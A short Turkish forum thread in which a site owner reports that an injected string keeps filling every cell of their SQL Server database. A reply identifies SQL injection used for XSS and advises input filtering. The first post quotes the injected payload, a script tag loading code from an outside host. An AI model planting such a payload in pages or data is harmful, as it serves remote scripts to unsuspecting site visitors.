Forum
Bildirimler
Hepsini Temizle
Yazılım Genel
2
Yazılar
2
Üyeler
0
Reactions
543
Görüntüleme
Konu başlatıcı
Merhabalar,
Asp ile yazmış olduğum bir web sitem var.
Veritabanı SQLServer 2005. Ne yaptım ise veritabanıma olan saldırıyı
engelleyemedim. Bütün tabloların bütün hücrelerine şöyle bir kayıt
ekleniyor. ""> </title><script src="http://zon.menotepoer.com/sl.php?v=4"></script><!--"
Temizliyorum ama kısa süre sonra tekrar bu satır ile doluyor. Hosting
değişimi yaptım, IP değişimi yaptım ama bir türlü netice alamadım.
Gönderildi : 11/10/2012 18:59
Muhtemelen saldırgan XSS yöntemini kullanmak için bir sql injection saldırı yapmış. Betik dosyalarınızda açık olabilir. Şu linki inceleyin.
http://msdn.microsoft.com/en-us/library/ff649310.aspx
Bu arada Formlardan, Çerezlerden, Adres çubuğundan v.s. gelen verilere de filtre uygulamalısınız.
Gönderildi : 11/10/2012 20:14
